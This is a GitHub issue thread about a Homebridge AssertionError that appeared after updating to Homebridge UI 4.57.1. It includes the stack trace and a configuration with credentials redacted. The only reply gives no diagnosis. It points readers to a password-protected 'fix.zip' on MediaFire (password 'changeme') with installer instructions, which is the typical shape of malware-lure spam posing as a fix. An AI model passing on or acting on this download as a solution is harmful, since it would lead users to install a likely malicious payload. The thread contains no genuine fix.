### ISSUE TITLE
AxionsError after Update to Homebridge UI 4.57.1

### ISSUE THREAD

**Issue by na-ma-ste** [homebridge/homebridge#3684]
### Current Situation

Hi,

after update to Homebridge UI 4.57.1 i get the Error-Message below on the console. How can I solve this? 

### Logs

```markdown
AssertionError [ERR_ASSERTION]: Cannot generate setupURI on an accessory that isn't published yet!
    at Bridge.Accessory.setupURI (/var/lib/homebridge/node_modules/homebridge/node_modules/hap-nodejs/src/lib/Accessory.ts:1004:11)
    at Server.setServerStatus (/var/lib/homebridge/node_modules/homebridge/src/server.ts:143:45)
    at Server.teardown (/var/lib/homebridge/node_modules/homebridge/src/server.ts:187:10)
    at signalHandler (/var/lib/homebridge/node_modules/homebridge/src/cli.ts:94:12)
    at process.emit (node:events:518:28)
    at process.emit (/var/lib/homebridge/node_modules/homebridge/node_modules/source-map-support/source-map-support.js:516:21)
```

### Configuration

```json
{
    "bridge": {
        "name": "Homebridge 3ECA",
        "username": ".....",
        "port": 51357,
        "pin": ".....",
        "advertiser": "avahi",
        "bind": [
            "eth0"
        ]
    },
    "accessories": [
        {
            "accessory": "HTTP-SWITCH",
            "name": "Weinkuehler",
            "switchType": "toggle",
            "onUrl": {
                "url": "https://publickitchenapi.casoapp.com/api/v1.0/Winecooler/SetLight",
                "method": "POST",
                "body": {
                    "technicalDeviceId": "....",
                    "zone": 0,
                    "lightOn": true
                },
                "headers": {
                    "x-api-key": ".....",
                    "Content-Type": "application/json"
                }
            },
            "offUrl": {
                "url": "https://publickitchenapi.casoapp.com/api/v1.0/Winecooler/SetLight",
                "method": "POST",
                "body": {
                    "technicalDeviceId": "....",
                    "zone": 0,
                    "lightOn": false
                },
                "headers": {
                    "x-api-key": "....",
                    "Content-Type": "application/json"
                }
            }
        }
    ],
    "platforms": [
        {
            "name": "Config",
            "port": 8581,
            "platform": "config"
        },
        {
            "name": "Harmony Wohnzimmer ",
            "hubIP": "....",
            "hubName": "Wohnzimmer",
            "DELAY_BEFORE_RETRY_AFTER_NETWORK_LOSS": 60000,
            "HUB_CONNECT_TIMEOUT": 10000,
            "HUB_SEND_TIMEOUT": 30000,
            "TVAccessory": false,
            "sortInput": 0,
            "switchAccessories": true,
            "showTurnOffActivity": "true",
            "publishSwitchActivitiesAsIndividualAccessories": true,
            "otherPlatforms": [
                {
                    "TVAccessory": false,
                    "sortInput": 0
                }
            ],
            "platform": "HarmonyHubWebSocket"
        },
        {
            "clientid": "....",
            "simulator": false,
            "language": {
                "api": "de-DE"
            },
            "....": {
                "addprograms": "none",
                "programs": []
            },
            "platform": "HomeConnect"
        },
        {
            "name": "FritzPlatform",
            "warn": true,
            "error": true,
            "extendedError": true,
            "devices": [
                {
                    "active": true,
                    "name": "FritzBox",
                    "host": "....",
                    "username": "....",
                    "password": ".....",
                    "ssl": true,
                    "tr064": true,
                    "igd": false,
                    "serialNumber": "5590 Fiber",
                    "wifiUnits": 2,
                    "master": true,
                    "connection": "dsl",
                    "options": {
                        "wifi_2ghz": "switch",
                        "wifi_5ghz": "switch",
                        "wifi_guest": "switch"
                    }
                }
            ],
            "options": {
                "polling": {
                    "timer": 15
                }
            },
            "platform": "FritzPlatform"
        },
        {
            "inverterIp": ".....",
            "pollInterval": 10,
            "pvMaxPower": 12000,
            "platform": "FroniusInverterLightsPlatform"
        },
        {
            "name": "Smartthings Plug",
            "BaseURL": "https://api.smartthings.com/v1/",
            "AccessToken": ".....",
            "GarageDoorMaxPoll": 40,
            "PollLocksSeconds": 10,
            "PollDoorsSeconds": 10,
            "PollSensorsSeconds": 5,
            "PollSwitchesAndLightsSeconds": 10,
            "PollWindowShadesSeconds": 20,
            "ExposeHumiditySensorForAirConditioners": false,
            "OptionalModeForAirConditioners": "None",
            "platform": "HomeBridgeSmartThings",
            "_bridge": {
                "username": "....",
                "port": ....
            }
        },
        {
            "emailAddress": "....",
            "password": ".....",
            "devices": [
                {
                    "name": "Garagentür",
                    "unlatchFromUnlockedToUnlocked": false,
                    "unlatchLock": false,
                    "disableUnlock": false,
                    "defaultLockName": "Lock",
                    "defaultLatchName": "Latch"
                }
            ],
            "updateInterval": 15,
            "maximumApiRetry": 3,
            "platform": "TedeePlatform"
        },
        {
            "name": "Miele@home",
            "clientID": ".....",
            "clientSecret": ".....",
            "language": "de",
            "reconnectEventServerInterval": 60,
            "platform": "Miele@home"
        },
        {
            "platform": "EufySecurity",
            "name": "EufySecurity",
            "cameras": [
                {
                    "serialNumber": "....",
                    "rtsp": false
                },
                {
                    "serialNumber": "....",
                    "snapshotHandlingMethod": 2
                },
                {
                    "serialNumber": "....",
                    "snapshotHandlingMethod": 2
                },
                {
                    "serialNumber": "....",
                    "snapshotHandlingMethod": 2
                }
            ],
            "username": "...",
            "password": "......",
            "country": "DE",
            "deviceName": "",
            "_bridge": {
                "username": "...",
                "port": ....
            }
        },
        {
            "name": "SwitchBot",
            "credentials": {
                "token": "...",
                "secret": ".....",
                "notice": "Keep your Token & Secret a secret!"
            },
            "options": {
                "devices": [
                    {
                        "deviceId": "....",
                        "configDeviceName": "SiwtchBotHubMiniGartenhaus",
                        "hide_device": true,
                        "configDeviceType": "Hub 2",
                        "connectionType": "OpenAPI",
                        "hub": {
                            "hide_temperature": false
                        }
                    },
                    {
                        "deviceId": "....",
                        "configDeviceName": "Geraeteschuppen",
                        "configDeviceType": "MeterPlus",
                        "connectionType": "OpenAPI",
                        "meter": {
                            "convertUnitTo": "CELSIUS"
                        }
                    },
                    {
                        "deviceId": "....",
                        "configDeviceName": "Pfanzenstube",
                        "configDeviceType": "MeterPlus",
                        "connectionType": "OpenAPI",
                        "meter": {
                            "convertUnitTo": "CELSIUS"
                        }
                    }
                ]
            },
            "platform": "SwitchBot"
        }
    ],
    "disabledPlugins": [
        "homebridge-luxtronik2",
        "homebridge-fronius-inverter-lights"
    ]
}
```

### Environment

- OS: Debian GNU/Linux Bookworm (12)
- Homebridge UI: 4.57.1 
- Homebridge Server: 1.8.4
- Node: 20.11.0
- npm:

### Process Supervisor

hb-service

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
